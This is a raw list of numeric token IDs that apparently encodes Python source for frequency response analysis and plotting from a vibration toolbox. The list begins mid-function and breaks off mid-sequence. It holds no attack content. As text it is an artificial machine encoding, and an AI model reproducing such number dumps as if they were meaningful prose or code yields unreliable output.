220, 220, 220, 220, 220, 1216, 38353, 796, 45941, 13, 18747, 7, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 16410, 47, 487, 58, 15, 11, 1312, 4357, 45941, 13, 1102, 73, 7, 47, 26152, 58, 15, 11, 1312, 12962, 4357, 685, 47, 26152, 58, 15, 11, 1312, 4357, 350, 5324, 58, 15, 11, 1312, 11907, 12962, 628, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 17130, 796, 352, 220, 1303, 45941, 13, 31166, 17034, 7, 47, 487, 58, 15, 11, 72, 60, 14, 47, 5324, 58, 15, 11, 72, 12962, 628, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1216, 38353, 796, 45941, 13, 18747, 26933, 58, 47, 487, 58, 15, 11, 1312, 4357, 17130, 1635, 45941, 13, 1102, 73, 7, 47, 26152, 58, 15, 11, 1312, 12962, 4357, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 685, 26591, 1635, 350, 26152, 58, 15, 11, 1312, 4357, 17130, 1174, 17, 1635, 350, 5324, 58, 15, 11, 1312, 11907, 12962, 628, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 30592, 11, 1569, 6359, 796, 8591, 13, 68, 394, 7, 8310, 38353, 8, 628, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 6376, 796, 30592, 13, 22046, 419, 3419, 628, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 30592, 796, 30592, 58, 9630, 60, 628, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1569, 6359, 796, 1569, 6359, 58, 45299, 6376, 60, 628, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 309, 26152, 85, 58, 15, 11, 1312, 60, 796, 532, 7, 303, 6359, 58, 15, 11, 657, 60, 1220, 1569, 6359, 58, 16, 11, 657, 12962, 1220, 17130, 628, 220, 220, 220, 1441, 2030, 80, 11, 309, 26152, 16, 11, 309, 26152, 17, 11, 16883, 11, 309, 26152, 85, 628, 198, 4299, 1216, 69, 29487, 7, 19503, 80, 11, 367, 11, 2030, 80, 62, 1084, 28, 15, 11, 2030, 80, 62, 9806, 28, 14202, 11, 2099, 28, 16, 11, 8177, 28, 21737, 2599, 198, 220, 220, 220, 37227, 37, 28707, 18261, 15553, 2495, 29353, 13, 628, 220, 220, 220, 1345, 1747, 8373, 2882, 5499, 287, 257, 4996, 286, 17519, 628, 220, 220, 220, 40117, 198, 220, 220, 220, 24200, 438, 198, 220, 220, 220, 2030, 80, 1058, 12178, 7177, 198, 220, 220, 220, 220, 220, 220, 220, 31902, 15879, 357, 6335, 14, 2363, 828, 357, 16, 87, 45, 8, 198, 220, 220, 220, 367, 1058, 12178, 7177, 198, 220, 220, 220, 220, 220, 220, 220, 31902, 2882, 5499, 357, 77, 87, 45, 8, 198, 220, 220, 220, 2030, 80, 62, 1084, 1058, 12178, 11, 11902, 198, 220, 220, 220, 220, 220, 220, 220, 7754, 8373, 329, 7110, 357, 12286, 657, 8, 198, 220, 220, 220, 2030, 80, 62, 1084, 1058, 12178, 11, 11902, 198, 220, 220, 220, 220, 220, 220, 220, 3334, 8373, 329, 7110, 357, 12286, 3509, 8373, 8, 198, 220, 220, 220, 8177, 1058, 4731, 7177, 198, 220, 220, 220, 220, 220, 220, 220, 15690, 286, 4731, 329, 779, 287, 8177, 13, 198, 220, 220, 220, 2099, 1058, 493, 11, 11902, 198, 220, 220, 220, 220, 220, 220, 220, 28114, 2099, 13, 4091, 4710, 13, 628, 220, 220, 220, 16409, 198, 220, 220, 220, 35656, 198, 220, 220, 220, 7877, 1058, 16488, 5563, 198, 220, 220, 220, 220, 220, 220, 220, 3578, 17512, 286, 7110, 10007, 357, 87, 18242, 11, 3670, 23029, 628, 220, 220, 220, 21066, 198, 220, 220, 220, 24200, 198, 220, 220, 220, 13163, 1330, 2603, 29487, 8019, 13, 9078, 29487, 355, 458, 83, 198, 220, 220, 220, 13163, 1330, 30999, 33407, 355, 410, 83, 198, 220, 220, 220, 13163, 1330, 299, 32152, 355, 45941, 198, 220, 220, 220, 13163, 277, 28, 37659, 13, 21602, 10223, 7, 15, 11, 3064, 11, 49388, 737, 3447, 1758, 32590, 16, 11, 16, 1776, 198, 220, 220, 220, 13163, 266, 28, 69, 9, 17, 9, 37659, 13, 14415, 26, 198, 220, 220, 220, 13163, 479, 28, 16, 68, 20, 26, 76, 28, 16, 26, 66, 28, 16, 26, 198, 220, 220, 220, 13163, 1216, 69, 16, 28, 16, 19571, 7, 76, 9, 7, 86, 9, 16, 73, 8, 1174, 17, 10, 66, 9, 16, 73, 9, 86, 10, 74, 8, 198, 220, 220, 220, 13163, 1216, 69, 17, 28, 16, 19571, 7, 76, 9, 7, 86, 9, 16, 73, 8, 1174, 17, 10, 66, 9, 16, 73, 9, 86, 10, 74, 9, 18, 8, 198, 220, 220, 220, 13163, 4808, 796, 410, 83, 13, 8310, 69, 29487, 7, 69, 11, 37659, 13, 71, 25558, 19510, 8310, 69, 16, 11, 8310, 69, 17, 36911, 8177, 796, 37250, 10913, 37, 352, 41707, 10913, 37, 362, 6, 12962, 198, 220, 220, 220, 2644, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 10412, 395, 25, 1343, 18831, 4061, 628, 220, 220, 220, 11822, 198, 220, 220, 220, 37404, 198, 220, 220, 220, 1343, 982, 19529, 47232, 10, 198, 220, 220, 220, 930, 220, 2099, 220, 220, 930, 220, 28114, 3918, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 930, 198, 220, 220, 220, 1343, 2559, 28, 10, 10052, 4770, 10, 198, 220, 220, 220, 930, 352, 357, 4299, 8, 930, 220, 14872, 3984, 290, 18983, 9051, 376, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 930, 198, 220, 220, 220, 1343, 982, 19529, 47232, 10, 198, 220, 220, 220, 930, 362, 220, 220, 220, 220, 220, 220, 930, 220, 14872, 3984, 290, 18983, 9051, 2604, 940, 7, 37, 8, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 930, 198, 220, 220, 220, 1343, 982, 19529, 47232, 10, 198, 220, 220, 220, 930, 513, 220, 220, 220, 220, 220, 220, 930, 220, 26285, 417, 519, 357, 48017, 3984, 290, 18983, 9051, 2604, 940, 7, 86, 4008, 930, 198, 220, 220, 220, 1343, 982, 19529, 47232, 10, 198, 220, 220, 220, 930, 604, 220, 220, 220, 220, 220, 220, 930, 220, 6416, 290, 39440, 3219, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 930, 198, 220, 220, 220, 1343, 982, 19529, 47232, 10, 198, 220, 220, 220, 930, 642, 220, 220, 220, 220, 220, 220, 930, 220, 17735, 30062, 357, 3546, 363, 3219, 9051, 6416, 8, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 930, 198, 220, 220, 220, 1343, 982, 19529, 47232, 10, 198, 220, 220, 220, 930, 718, 220, 220, 220, 220, 220, 220, 930, 220, 14872, 3984, 9051, 376, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 930, 198, 220, 220, 220, 1343, 982, 19529, 47232, 10, 198, 220, 220, 220, 930, 767, 220, 220, 220, 220, 220, 220, 930, 220, 18983, 9051, 376, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 930, 198, 220, 220, 220, 1343, 982, 19529, 47232, 10, 198, 220, 220, 220, 930, 807, 220, 220, 220, 220, 220, 220, 930, 220, 6416, 9051, 376, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 930, 198, 220, 220, 220, 1343, 982, 19529, 47232, 10, 198, 220, 220, 220, 930, 860, 220, 220, 220, 220, 220, 220, 930, 220, 39440, 3219, 9051, 376, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 930, 198, 220, 220, 220, 1343, 982, 19529, 47232, 10, 198, 220, 220, 220, 930, 838, 220, 220, 220, 220, 220, 930, 220, 14872, 3984, 9051, 2604, 940, 7, 37, 8, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 930, 198, 220, 220, 220, 1343, 982, 19529, 47232, 10, 198, 220, 220, 220, 930, 1367, 220, 220, 220, 220, 220, 930, 220, 18983, 9051, 2604, 940, 7, 37, 8, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 930, 198, 220, 220, 220, 1343, 982, 19529, 47232, 10, 198, 220, 220, 220, 930, 1105, 220, 220, 220, 220, 220, 930, 220, 6416, 9051, 2604, 940, 7, 37, 8, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 930, 198, 220, 220, 220, 1343, 982, 19529, 47232, 10, 198, 220, 220, 220, 930, 1511, 220, 220, 220, 220, 220, 930, 220, 39440, 3219, 9051, 2604, 940, 7, 37, 8, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 930, 198, 220, 220, 220, 1343, 982, 19529, 47232, 10, 198, 220, 220, 220, 930, 1478, 220, 220, 220, 220, 220, 930, 220, 14872, 3984, 9051, 2604, 940, 7, 86, 8, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 930, 198, 220, 220, 220, 1343, 982, 19529, 47232, 10, 198, 220, 220, 220, 930, 1315, 220, 220, 220, 220, 220, 930, 220, 18983, 9051, 2604, 940, 7, 86, 8, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 930, 198, 220, 220, 220, 1343, 982, 19529, 47232, 10, 628, 220, 220, 220, 11485, 766, 14508, 3712, 4600, 8310, 23411, 63, 628, 220, 220, 220, 15069, 449, 13, 44289, 11, 4280, 1596, 11, 9162, 198, 220, 220, 220, 19433, 3035, 2681, 11, 8735, 198, 220, 220, 220, 4347, 276, 284, 11361, 11, 2901, 352, 11, 1853, 628, 220, 220, 220, 37227, 198, 220, 220, 220, 9977, 4760, 796, 2099, 220, 1303, 28114, 2099, 11, 815, 9195, 68, 25121, 3690, 13, 198, 220, 220, 220, 2030, 80, 796, 2030, 80, 13, 3447, 1758, 7, 16, 11, 532, 16, 8, 198, 220, 220, 220, 18896, 37, 796, 2030, 80, 13, 43358, 58, 16, 60, 198, 220, 220, 220, 611, 18896, 7, 39, 13, 43358, 8, 318, 352, 25, 198, 220, 220, 220, 220, 220, 220, 220, 367, 796, 367, 13, 3447, 1758, 7, 16, 11, 532, 16, 8, 628, 220, 220, 220, 611, 367, 13, 43358, 58, 15, 60, 1875, 367, 13, 43358, 58, 16, 5974, 198, 220, 220, 220, 220, 220, 220, 220, 367, 796, 367, 13, 51, 628, 220, 220, 220, 611, 2030, 80, 62, 9806, 318, 6045, 25, 198, 220, 220, 220, 220, 220, 220, 220, 2030, 80, 62, 9806, 796, 45941, 13, 9806, 7, 19503, 80, 8, 628, 220, 220, 220, 611, 2030, 80, 62, 1084, 318, 6045, 25, 198, 220, 220, 220, 220, 220, 220, 220, 2030, 80, 62, 1084, 796, 45941, 13, 1084, 7, 19503, 80, 8, 628, 220, 220, 220, 611, 2030, 80, 62, 1084, 1279, 45941, 13, 1084, 7, 19503, 80, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 2030, 80, 62, 1084, 796, 45941, 13, 1084, 7, 19503, 80, 8, 628, 220, 220, 220, 611, 2030, 80, 62, 1084, 1875, 2030, 80, 62, 9806, 25, 198, 220, 220, 220, 220, 220, 220, 220, 5298, 11052, 12331, 10786, 19503, 80, 62, 1084, 1276, 307, 1342, 621, 2030, 80, 62, 9806, 2637, 8, 628, 220, 220, 220, 1303, 3601, 7, 2536, 7, 37659, 13, 5669, 7, 19503, 80, 22305, 198, 220, 220, 220, 287, 9319, 796, 493, 7, 11925, 37, 1635, 357, 19503, 80, 62, 1084, 532, 45941, 13, 5669, 7, 19503, 80, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1267, 3373, 357, 37659, 13, 321, 897, 7, 19503, 80, 8, 532, 45941, 13, 5669, 7, 19503, 80, 22305, 628, 220, 220, 220, 287, 8929, 796, 493, 7, 11925, 37, 1635, 357, 19503, 80, 62, 9806, 532, 45941, 13, 5669, 7, 19503, 80, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1267, 3373, 357, 37659, 13, 321, 897, 7, 19503, 80, 8, 532, 45941, 13, 5669, 7, 19503, 80, 4008, 532, 352, 8, 198, 220, 220, 220, 1303, 611, 287, 9319, 27, 16, 11, 259, 9319, 28, 16, 26, 437, 198, 220, 220, 220, 1303, 611, 287, 8929, 29, 11925, 37, 11, 259, 8929, 28, 11925, 37, 26, 437, 198, 220, 220, 220, 37227, 4798, 10786, 19503, 80, 5485, 25, 23884, 4458, 18982, 7, 19503, 80, 13, 43358, 4008, 198, 220, 220, 220, 3601, 10786, 39, 5485, 25, 23884, 4458, 18982, 7, 39, 13, 43358, 4008, 198, 220, 220, 220, 3601, 10786, 15732, 286, 1877, 8373, 25, 23884, 4458, 18982, 7, 259, 9319, 4008, 198, 220, 220, 220, 3601, 10786, 15732, 286, 1029, 8373, 25, 23884, 4458, 18982, 7, 259, 8929, 4008, 37811, 198, 220, 220, 220, 367, 796, 367, 58, 45299, 287, 9319, 25, 259, 8929, 60, 198, 220, 220, 220, 1303, 3601, 7, 39, 13, 43358, 8, 198, 220, 220, 220, 2030, 80, 796, 2030, 80, 58, 45299, 287, 9319, 25, 259, 8929, 60, 198, 220, 220, 220, 2153, 796, 1160, 1635, 45941, 13, 6404, 940, 7, 37659, 13, 8937, 7, 39, 4008, 198, 220, 220, 220, 1303, 3601, 7, 19726, 8, 198, 220, 220, 220, 1303, 3601, 7, 19726, 13, 43358, 8, 198, 220, 220, 220, 949, 19726, 796, 45941, 13, 1084, 7, 19726, 8, 198, 220, 220, 220, 3509, 19726, 796, 45941, 13, 9806, 7, 19726, 8, 198, 220, 220, 220, 7108, 796, 45941, 13, 403, 37150, 7, 37659, 13, 9248, 7, 39, 4008, 1635, 11546, 1220, 45941, 13, 14415, 198, 220, 220, 220, 1303, 220, 220, 220, 872, 1084, 62, 9806, 41888, 1084, 7, 40715, 8, 1003, 2231, 27493, 2231, 2906, 346, 7, 9806, 7, 9806, 7, 40715, 4008, 14, 2231, 27493, 2231, 11208, 198, 220, 220, 220, 872, 1084, 796, 45941, 13, 5669, 7, 40715, 8, 3373, 4153, 1635, 4153, 13, 15, 198, 220, 220, 220, 872, 9806, 796, 357, 37659, 13, 321, 897, 7, 40715, 8, 3373, 4153, 1343, 352, 8, 1635, 4153, 198, 220, 220, 220, 37227, 1084, 5305, 796, 45941, 13, 5669, 7, 37659, 13, 5305, 7, 39, 4008, 198, 220, 220, 220, 3509, 5305, 796, 45941, 13, 321, 897, 7, 37659, 13, 5305, 7, 39, 4008, 198, 220, 220, 220, 10356, 363, 796, 45941, 13, 5669, 7, 37659, 13, 48466, 7, 39, 4008, 198, 220, 220, 220, 12991, 363, 796, 45941, 13, 321, 897, 7, 37659, 13, 48466, 7, 39, 4008, 37811, 628, 220, 220, 220, 611, 9977, 4760, 318, 352, 25, 198, 220, 220, 220, 220, 220, 220, 220, 2336, 11, 357, 897, 16, 11, 7877, 17, 8, 796, 458, 83, 13, 7266, 489, 1747, 7, 17, 11, 352, 8, 198, 220, 220, 220, 220, 220, 220, 220, 7877, 16, 13, 29487, 7, 19503, 80, 13, 51, 11, 2153, 13, 51, 8, 198, 220, 220, 220, 220, 220, 220, 220, 7877, 16, 13, 2617, 62, 87, 18242, 10786, 37, 28707, 357, 7399, 8, 11537, 198, 220, 220, 220, 220, 220, 220, 220, 7877, 16, 13, 2617, 62, 2645, 9608, 10786, 13436, 357, 36077, 8, 11537, 198, 220, 220, 220, 220, 220, 220, 220, 7877, 16, 13, 25928, 3419, 198, 220, 220, 220, 220, 220, 220, 220, 7877, 16, 13, 2617, 62, 87, 2475, 7, 87, 9806, 28, 19503, 80, 62, 9806, 11, 2124, 1084, 28, 19503, 80, 62, 1084, 8, 198, 220, 220, 220, 220, 220, 220, 220, 7877, 16, 13, 2617, 62, 88, 2475, 7, 4948, 897, 28, 9806, 19726, 11, 331, 1084, 28, 1084, 19726, 8, 628, 220, 220, 220, 220, 220, 220, 220, 7877, 17, 13, 29487, 7, 19503, 80, 13, 51, 11, 7108, 13, 51, 8, 198, 220, 220, 220, 220, 220, 220, 220, 7877, 17, 13, 2617, 62, 87, 18242, 10786, 37, 28707, 357, 7399, 8, 11537, 198, 220, 220, 220, 220, 220, 220, 220, 7877, 17, 13, 2617, 62, 2645, 9608, 10786, 35645, 357, 13500, 8, 11537, 198, 220, 220, 220, 220, 220, 220, 220, 7877, 17, 13, 25928, 3419, 198, 220, 220, 220, 220, 220, 220, 220, 7877, 17, 13, 2617, 62, 87, 2475, 7, 87, 9806, 28, 19503, 80, 62, 9806, 11, 2124, 1084, 28, 19503, 80, 62, 1084, 8, 198, 220, 220, 220, 220, 220, 220, 220, 7877, 17, 13, 2617, 62, 88, 2475, 7, 4948, 897, 28, 746, 9806, 11, 331, 1084, 28, 746, 1084, 8, 198, 220, 220, 220, 220, 220, 220, 220, 7877, 17, 13, 2617, 62, 20760, 3378, 7, 37659, 13, 283, 858, 7, 746, 1084, 11, 357, 746, 9806, 1343, 4153, 828, 4153, 4008, 198, 220, 220, 220, 220, 220, 220, 220, 2336, 13, 33464, 62, 39786, 3419, 628, 220, 220, 220, 220, 220, 220, 220, 611, 18896, 7, 1455, 437, 8, 1875, 657, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 458, 83, 13, 1455, 437, 7, 1455, 437, 8, 198, 220, 220, 220, 220, 220, 220, 220, 7877, 796, 357, 897, 16, 11, 7877, 17, 8, 198, 220, 220, 220, 2073, 25, 198, 220, 220, 220, 220, 220, 220, 220, 3601, 7203, 14385, 11, 326, 3038, 2125, 470, 4855, 1865, 4943, 198, 220, 220, 220, 1441, 7877, 628, 220, 220, 220, 37227, 2, 1288, 361, 9977, 4760, 855, 17, 25, 198, 220, 220, 220, 1303, 850, 29487, 7, 17, 11, 16, 11, 16, 8, 198, 220, 220, 220, 1303, 5026, 346, 519, 87, 7, 37, 11, 19726, 8, 198, 220, 220, 220, 1303, 220, 220, 2124, 18242, 10786, 37, 28707, 357, 7399, 8, 11537, 198, 220, 220, 220, 1303, 220, 220, 331, 18242, 10786, 13436, 357, 36077, 8, 11537, 198, 220, 220, 220, 1303, 10706, 319, 198, 220, 220, 220, 1303, 4064, 220, 376, 1084, 11, 37, 9806, 11, 1084, 7, 19726, 828, 9806, 7, 19726, 8, 198, 220, 220, 220, 1303, 16488, 26933, 37, 1084, 376, 9806, 949, 19726, 3509, 19726, 12962, 628, 220, 220, 220, 1303, 850, 29487, 7, 17, 11, 16, 11, 17, 8, 198, 220, 220, 220, 1303, 5026, 346, 519, 87, 7, 37, 11, 40715, 8, 198, 220, 220, 220, 1303, 2124, 18242, 10786, 37, 28707, 357, 7399, 8, 11537, 198, 220, 220, 220, 1303, 331, 18242, 10786, 35645, 357, 13500, 8, 11537, 198, 220, 220, 220, 1303, 10706, 319, 198, 220, 220, 220, 1303, 16488, 26933, 37, 1084, 376, 9806, 220, 872, 1084, 62, 9806, 7, 16, 8, 872, 1084, 62, 9806, 7, 17, 8, 12962, 198, 220, 220, 220, 1303, 10706, 1084, 62, 9806, 28, 744, 7, 746, 1084, 62, 9806, 14, 3829, 27493, 3829, 26, 198, 220, 220, 220, 1303, 900, 7, 70, 6888, 4032, 56, 51, 624, 3256, 25928, 1084, 62, 9806, 7, 16, 2599, 3829, 25, 25928, 1084, 62, 9806, 7, 17, 4008, 628, 220, 220, 220, 1303, 1288, 361, 9977, 4760, 855, 18, 25, 198, 220, 220, 220, 1303, 850, 29487, 7, 17, 11, 16, 11, 16, 8, 198, 220, 220, 220, 1303, 2153, 28, 1238, 9, 6404, 940, 7, 8937, 7, 55, 2232, 18125, 198, 220, 220, 220, 1303, 5026, 346, 519, 87, 7, 37, 9, 17, 9, 14415, 11, 19726, 8, 198, 220, 220, 220, 1303, 2124, 18242, 10786, 37, 28707, 357, 15546, 14, 82, 8, 11537, 198, 220, 220, 220, 220, 220, 1303, 331, 18242, 10786, 13436, 357, 36077, 8, 11537, 198, 220, 220, 220, 220, 220, 1303, 10706, 319, 198, 220, 220, 220, 220, 220, 1303, 16488, 26933, 54, 1084, 370, 9806, 949, 19726, 3509, 19726, 12962, 198, 220, 220, 220, 220, 220, 1303, 19792, 319, 198, 220, 220, 220, 220, 220, 1303, 850, 29487, 7, 17, 11, 16, 11, 17, 8, 198, 220, 220, 220, 220, 220, 1303, 5026, 346, 519, 87, 7, 37, 9, 17, 9, 14415, 11, 40715, 8, 198, 220, 220, 220, 220, 220, 1303, 2124, 18242, 10786, 37, 28707, 357, 15546, 14, 82, 8, 11537, 198, 220, 220, 220, 220, 220, 1303, 331, 18242, 10786, 35645, 357, 13500, 8, 11537, 198, 220, 220, 220, 220, 220, 1303, 10706, 319, 198, 220, 220, 220, 220, 220, 1303, 16488, 26933, 54, 1084, 370, 9806, 220, 872, 1084, 62, 9806, 7, 16, 8, 872, 1084, 62, 9806, 7, 17, 8, 12962, 198, 220, 220, 220, 220, 220, 1303, 10706, 1084, 62, 9806, 28, 744, 7, 746, 1084, 62, 9806, 14, 3829, 27493, 3829, 26, 198, 220, 220, 220, 220, 220, 1303, 900, 7, 70, 6888, 4032, 56, 51, 624, 3256, 25928, 1084, 62, 9806, 7, 16, 2599, 3829, 25, 25928, 1084, 62, 9806, 7, 17, 4008, 628, 220, 220, 220, 220, 1303, 2073, 361, 9977, 4760, 855, 19, 198, 220, 220, 220, 220, 1303, 850, 29487, 7, 17, 11, 16, 11, 16, 8, 198, 220, 220, 220, 220, 1303, 7110, 7, 37, 11, 5305, 7, 55, 2232, 4008, 198, 220, 220, 220, 220, 1303, 220, 2124, 18242, 10786, 37, 28707, 357, 7399, 8, 11537, 198, 220, 220, 220, 220, 1303, 331, 18242, 10786, 15633, 11537, 198, 220, 220, 220, 220, 1303, 10706, 319, 198, 220, 220, 220, 220, 1303, 16488, 26933, 37, 1084, 376, 9806, 949, 5305, 3509, 5305, 12962, 198, 220, 220, 220, 220, 1303, 19792, 319, 198, 220, 220, 220, 220, 1303, 850, 29487, 7, 17, 11, 16, 11, 17, 8, 198, 220, 220, 220, 220, 1303, 7110, 7, 37, 11, 48466, 7, 55, 2232, 4008, 198, 220, 220, 220, 220, 1303, 220, 2124, 18242, 10786, 37, 28707, 357, 7399, 8, 11537, 198, 220, 220, 220, 220, 1303, 331, 18242, 10786, 3546, 363, 3219, 11537, 198, 220, 220, 220, 220, 1303, 10706, 319, 198, 220, 220, 220, 220, 1303, 16488, 26933, 37, 1084, 376, 9806, 10356, 363, 12991, 363, 12962, 198, 220, 220, 220, 220, 1303, 19792, 319, 198, 220, 220, 220, 220, 1303, 2073, 361, 9977, 4760, 855, 20, 198, 220, 220, 220, 220, 1303, 850, 29487, 7, 16, 11, 16, 11, 16, 8, 198, 220, 220, 220, 220, 1303, 545, 897, 28, 744, 7, 13664, 7, 37, 27493, 37, 9806, 14, 9806, 7, 37, 18125, 198, 220, 220, 220, 220, 1303, 545, 259, 28, 744, 7, 13664, 7, 37, 27493, 37, 1084, 14, 9806, 7, 37, 4008, 10, 16, 26, 198, 220, 220, 220, 220, 1303, 7110, 7, 5305, 7, 55, 2232, 7, 320, 259, 25, 320, 897, 36911, 48466, 7, 55, 2232, 7, 320, 259, 25, 320, 897, 22305, 198, 220, 220, 220, 220, 1303, 2124, 18242, 10786, 15633, 11537, 198, 220, 220, 220, 220, 1303, 331, 18242, 10786, 3546, 363, 3219, 11537, 198, 220, 220, 220, 220, 1303, 10706, 319, 198, 220, 220, 220, 220, 1303, 19792, 319, 198, 220, 220, 220, 220, 1303, 2073, 361, 9977, 4760, 855, 21, 198, 220, 220, 220, 220, 1303, 850, 29487, 7, 16, 11, 16, 11, 16, 8, 198, 220, 220, 220, 220, 1303, 2153, 28, 1238, 9, 6404, 940, 7, 8937, 7, 55, 2232, 18125, 198, 220, 220, 220, 220, 1303, 7110, 7, 37, 11, 19726, 8, 198, 220, 220, 220, 220, 1303, 220, 2124, 18242, 10786, 37, 28707, 357, 7399, 8, 11537, 198, 220, 220, 220, 220, 1303, 220, 331, 18242, 10786, 13436, 357, 36077, 8, 11537, 198, 220, 220, 220, 220, 1303, 10706, 319, 198, 220, 220, 220, 220, 1303, 16488, 26933, 37, 1084, 376, 9806, 949, 19726, 3509, 19726, 12962, 198, 220, 220, 220, 220, 1303, 19792, 319, 198, 220, 220, 220, 220, 1303, 2073, 361, 9977, 4760, 855, 22, 198, 220, 220, 220, 220, 1303, 850, 29487, 7, 16, 11, 16, 11, 16, 8, 198, 220, 220, 220, 220, 1303, 7110, 7, 37, 11, 40715, 8, 198, 220, 220, 220, 220, 1303, 220, 2124, 18242, 10786, 37, 28707, 357, 7399, 8, 11537, 198, 220, 220, 220, 220, 1303, 220, 331, 18242, 10786, 35645, 357, 13500, 8, 11537, 198, 220, 220, 220, 220, 1303, 10706, 319, 198, 220, 220, 220, 220, 1303, 872, 1084, 62, 9806, 41888, 28300, 7, 1084, 7, 40715, 20679, 2231, 27493, 2231, 2906, 346, 7, 9806, 7, 40715, 20679, 2231, 27493, 2231, 11208, 198, 220, 220, 220, 220, 1303, 16488, 26933, 37, 1084, 376, 9806, 220, 872, 1084, 62, 9806, 7, 16, 8, 872, 1084, 62, 9806, 7, 17, 8, 12962, 198, 220, 220, 220, 220, 1303, 10706, 1084, 62, 9806, 28, 744, 7, 746, 1084, 62, 9806, 14, 3829, 27493, 3829, 26, 198, 220, 220, 220, 220, 1303, 900, 7, 70, 6888, 4032, 56, 51, 624, 3256, 25928, 1084, 62, 9806, 7, 16, 2599, 3829, 25, 25928, 1084, 62, 9806, 7, 17, 4008, 198, 220, 220, 220, 220, 1303, 19792, 319, 198, 220, 220, 220, 220, 1303, 2073, 361, 9977, 4760, 855, 23, 198, 220, 220, 220, 220, 1303, 850, 29487, 7, 16, 11, 16, 11, 16, 8, 198, 220, 220, 220, 220, 1303, 7110, 7, 37, 11, 5305, 7, 55, 2232, 4008, 198, 220, 220, 220, 220, 1303, 220, 2124, 18242, 10786, 37, 28707, 357, 7399, 8, 11537, 198, 220, 220, 220, 220, 1303, 331, 18242, 10786, 15633, 11537, 198, 220, 220, 220, 220, 1303, 10706, 319, 198, 220, 220, 220, 220, 1303, 16488, 26933, 37, 1084, 376, 9806, 949, 5305, 3509, 5305, 12962, 198, 220, 220, 220, 220, 1303, 19792, 319, 198, 220, 220, 220, 220, 1303, 2073, 361, 9977, 4760, 855, 24, 198, 220, 220, 220, 220, 1303, 850, 29487, 7, 16, 11, 16, 11, 16, 8, 198, 220, 220, 220, 220, 1303, 7110, 7, 37, 11, 48466, 7, 55, 2232, 4008, 198, 220, 220, 220, 220, 1303, 220, 2124, 18242, 10786, 37, 28707, 357, 7399, 8, 11537, 198, 220, 220, 220, 220, 1303, 331, 18242, 10786, 3546, 363, 3219, 11537, 198, 220, 220, 220, 220, 1303, 10706, 319, 198, 220, 220, 220, 220, 1303, 16488, 26933, 37, 1084, 376, 9806, 10356, 363, 12991, 363, 12962, 198, 220, 220, 220, 220, 1303, 19792, 319, 198, 220, 220, 220, 220, 1303, 2073, 361, 9977, 4760, 855, 940, 198, 220, 220, 220, 220, 1303, 850, 29487, 7, 16, 11, 16, 11, 16, 8, 198, 220, 220, 220, 220, 1303, 2153, 28, 1238, 9, 6404, 940, 7, 8937, 7, 55, 2232, 18125, 198, 220, 220, 220, 220, 1303, 5026, 346, 519, 87, 7, 37, 11, 19726, 8, 198, 220, 220, 220, 220, 1303, 220, 2124, 18242, 10786, 37, 28707, 357, 7399, 8, 11537, 198, 220, 220, 220, 220, 1303, 220, 331, 18242, 10786, 13436, 357, 36077, 8, 11537, 198, 220, 220, 220, 220, 1303, 10706, 319, 198, 220, 220, 220, 220, 1303, 16488, 26933, 37, 1084, 376, 9806, 949, 19726, 3509, 19726, 12962, 198, 220, 220, 220, 220, 1303, 19792, 319, 198, 220, 220, 220, 220, 1303, 2073, 361, 9977, 4760, 855, 1157, 198, 220, 220, 220, 220, 1303, 